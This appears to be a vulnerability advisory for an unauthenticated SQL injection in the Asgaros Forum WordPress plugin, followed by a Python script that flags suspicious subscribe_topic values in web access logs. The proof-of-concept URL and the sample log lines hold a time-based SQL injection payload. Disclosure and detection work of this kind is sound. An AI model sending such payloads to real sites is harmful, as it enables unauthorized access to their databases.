wpexploit
JrXnm
WPEX-ID:36CC5151-1D5E-4874-BCEC-3B6326235DB1
History: Oct 11, 2021 - 12:00 a.m.

Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection


EPSS: 0.213 Low

Percentile: 96.5%

The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.

https://example.com/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10)
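A detection sketch for the request shape above, added here as an example and not taken from the plugin or the advisory: it scans web access logs for `subscribe_topic` values that are not plain decimal integers. The combined log format, the assumption that legitimate topic IDs are decimal integers, the function names and the sample lines are all assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Oct/2021:10:00:01 +0000] "GET /forum/?subscribe_topic=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Oct/2021:10:00:05 +0000] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/1.1" 200 5120 "-" "curl/7.79"',
    '198.51.100.7 - - [11/Oct/2021:10:00:09 +0000] "GET /forum/?view=topic&id=3 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Oct/2021:10:00:30 +0000] "GET /forum/?subscribe_topic=7%2B1 HTTP/1.1" 200 5120 "-" "curl/7.79"',
    'malformed line without a request',
]

# Client IP, timestamp and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
PARAM = "subscribe_topic"  # parameter named in the advisory's example URL


def suspicious_values(target):
    """Return URL-decoded subscribe_topic values that are not plain decimal integers."""
    query = urlsplit(target).query
    values = parse_qs(query, keep_blank_values=True).get(PARAM, [])
    # Assumption: a legitimate topic ID is digits only; anything else is worth review.
    return [v for v in values if not re.fullmatch(r"[0-9]+", v)]


def scan(lines):
    """Return one finding per non-integer subscribe_topic value seen in the log."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not parseable requests
        for value in suspicious_values(m.group("target")):
            findings.append(
                {"line": lineno, "ip": m.group("ip"), "ts": m.group("ts"), "value": value}
            )
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

This only covers the parameter when it arrives in the query string, as in the URL above; hits on a site running a version below 1.15.13 are worth correlating with response times and database logs.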
